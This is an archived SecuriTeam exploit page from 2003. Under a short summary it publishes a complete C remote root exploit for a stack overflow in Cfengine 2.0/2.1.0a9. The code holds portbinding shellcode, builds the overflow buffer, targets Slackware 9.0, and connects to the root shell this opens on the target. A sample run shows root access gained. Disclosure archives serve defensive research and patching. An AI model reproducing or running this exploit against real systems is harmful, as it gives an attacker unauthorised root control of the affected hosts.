Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Cfengine Remotely Exploitable Buffer Overflow (Improved Exploit) 2 Oct. 2003    Summary As we reported in our previous article: Cfengine Remotely Exploitable Buffer Overflow (net.c), a remotely exploitable buffer overflow in Cfengine allows remote attackers to cause the program to execute arbitrary code. The following exploit code is an improved exploit code for the mentioned vulnerability.   Credit: The information has been provided by li0n7. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Exploit: /* Remote root exploit for cfengine-2.0/2.1.0a9 (stack-based overflow) by Li0n7  *  * Vulnerability discovered by Nick Cleaton (nick[at]cleaton[dot]net)  *  * Contact me: Li0n7[at]voila[dot]fr  *  * Visit us: www.ioc.fr.st (for those who can speak French)  *  * My world: l7l.linux-fan.com  *  * Here's an example:  * ./exploit -h localhost -p 5308 -t 0  * [+] Building evil string to send (using ret = 0xbf7fec10)...  * [+] Connected to 127.0.0.1 on port 5308  * [+] Payload sent  * [+] Trying to connect to 127.0.0.1 on port 26112...  * [+] Let's rock on!  * Linux Li0n7 2.4.20 #2 Mon Mar 17 22:02:15 PST 2003 i686 unknown  * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)  */ #include <stdio.h> #include <unistd.h> #include <netdb.h> #include <netinet/in.h> #include <errno.h> #define BACK 26112 #define RET 0xbf7fee04 #define PORT 5308 #define ERROR -1 #define BUFFERSIZE 4096 #define SIZE 4136 char shellcode[] = /* bighawk 78 bytes portbinding shellcode */ "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0" "\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10" "\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1" "\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89" "\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e" "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53" "\x89\xe1\xb0\x0b\xcd\x80"; struct os_ret_addr {       int num;       char *plat;       long ret; }; struct os_ret_addr exp_os[]= {       {0,"slack 9.0",0xbf7fec10},       NULL }; void check_error(long host,int port) {       if(!host)       {           fprintf(stderr,"[-] Host address incorrect,exiting...\n");           exit(ERROR);       }       if(port < 1 || port > 65535)       {           fprintf(stderr,"[-] Port \'%i\' incorrect,exiting...\n",port);           exit(ERROR);       }       return; } char *build(long ret) {       char *buffer,*ptr;       int i;       long *addr_ptr;       fprintf(stdout,"[+] Building evil string to send (using ret = 0x%x)...\n",ret);       buffer = (char *)malloc(SIZE+1);              if(!buffer)       {           fprintf(stderr,"[-] Can't allocate memory,exiting...\n");           exit(ERROR);       }       ptr = buffer;       memset(ptr,0x90,SIZE);       memcpy(ptr,"3133337",7);       ptr += BUFFERSIZE-strlen(shellcode)-1000;       for(i=0;i<strlen(shellcode);i++)           *ptr++ = shellcode[i];       ptr += 1000;       addr_ptr = (long *)ptr;       for(i=0;i<120;i=i+4)           *(addr_ptr++) = ret;       ptr = (char *)addr_ptr;       *ptr = 0x0;       return buffer; } int back_connection(long host) {       struct sockaddr_in s;       u_char sock_buf[4096];       fd_set fds;       int fd,size;       char *command="/bin/uname -a ; /usr/bin/id;\n";       fd = socket(AF_INET, SOCK_STREAM, 0);       if (fd < 0)       {           fprintf(stderr,"[-] %s\n",strerror(errno));           exit(ERROR);       }       s.sin_family = AF_INET;       s.sin_port = htons(BACK);       s.sin_addr.s_addr = host;       if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)       {           fprintf(stderr,"[-] %s\n",strerror(errno));           close(fd);           return ERROR;       }       fprintf(stdout, "[+] Let's rock on!\n");       size = send(fd, command, strlen(command), 0);       if(size < 0)       {           fprintf(stderr,"[-] %s\n",strerror(errno));           close(fd);           exit(ERROR);       }       for (;;)       {           FD_ZERO(&fds);           FD_SET(0, &fds);           FD_SET(fd, &fds);           if (select(255, &fds, NULL, NULL, NULL) == -1)           {               fprintf(stderr,"[-] %s\n",strerror(errno));               close(fd);               exit(ERROR);           }           memset(sock_buf, 0, sizeof(sock_buf));           if (FD_ISSET(fd, &fds))           {               if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)               {                   fprintf(stderr, "[-] Connection closed by remote host,exiting...\n");                   close(fd);                   exit(0);               }               fprintf(stderr, "%s", sock_buf);           }           if (FD_ISSET(0, &fds))           {               read(0, sock_buf, sizeof(sock_buf));               write(fd, sock_buf, strlen(sock_buf));           }       }       return 0; } void set_connection(long host,int port,char *buffer) {       struct sockaddr_in s;       struct hostent * hoste;       int fd,size;       fd = socket(AF_INET,SOCK_STREAM,0);       if(fd < 0)       {           fprintf(stderr,"[-] %s\n",strerror(errno));           exit(ERROR);       }       s.sin_family = AF_INET;       s.sin_addr.s_addr = host;       s.sin_port = htons(port);       if(connect(fd,(struct sockaddr *)&s,sizeof(s)) == -1)       {           fprintf(stderr,"[-] %s\n",strerror(errno));           close(fd);           exit(ERROR);       }       fprintf(stdout,"[+] Connected to %s on port %i\n",inet_ntoa(s.sin_addr.s_addr),port);       size = send(fd,buffer,SIZE,0);       if(size < 0)       {           fprintf(stderr,"[-] %s\n",strerror(errno));           close(fd);           exit(ERROR);       }       fprintf(stdout,"[+] Payload sent\n[+] Trying to connect to %s on port %i...\n",inet_ntoa(s.sin_addr.s_addr),BACK);       sleep(2);       close(fd);   } long resolve_host(u_char *host_name) {       struct in_addr addr;       struct hostent *host_ent;       addr.s_addr = inet_addr(host_name);       if (addr.s_addr == -1)       {           host_ent = gethostbyname(host_name);           if (!host_ent) return(0);           memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);       }       return(addr.s_addr); } void die(char *argv) {       fprintf(stderr,"\tCfengine 2-2.1.0a9 remote root exploit by Li0n7 (http://www.ioc.fr.st)\n");       fprintf(stderr,"\t Vulnerability discovered by Nick Cleaton (nick@cleaton.net)\n");       fprintf(stderr,"\t My world: http://www.l7l.linux-fan.com\n");       fprintf(stderr,"\t Contact me: Li0n7@voila.fr\n");       fprintf(stderr," Usage: %s -h <host> [-p <port>][-r <retaddr>][-t <num>]\n",argv);       fprintf(stderr," Example: %s -h localhost -p 5308 -t 0\n\n",argv);       fprintf(stderr," Platforms supported are:\n");       fprintf(stderr," num: %i - %s - 0x%x\n",0,exp_os[0].plat,exp_os[0].ret);       exit(ERROR); } int main(int argc,char *argv[]) {       int i, option, port = PORT;       long ret = RET,host = 0;       char * option_list = "h:p:r:t:", buffer[SIZE+1];       opterr = 0;       if (argc < 4) die(argv[0]);       while((option = getopt(argc,argv,option_list)) != -1)           switch(option)           {               case 'h':                   host = resolve_host(optarg);                   break;               case 'p':                   port = atoi(optarg);                   break;               case 'r':                   ret = atol(optarg);                   break;               case 't':                   ret = exp_os[atoi(optarg)].ret;                   break;               case '?':                   fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);                   die(argv[0]);           }           check_error(host,port);       strncpy(buffer,build(ret),SIZE+1);       set_connection(host,port,buffer);       back_connection(host);       return 0; } /* A poil! */  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability Cisco Unified Service Monitor brstart add_dm Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®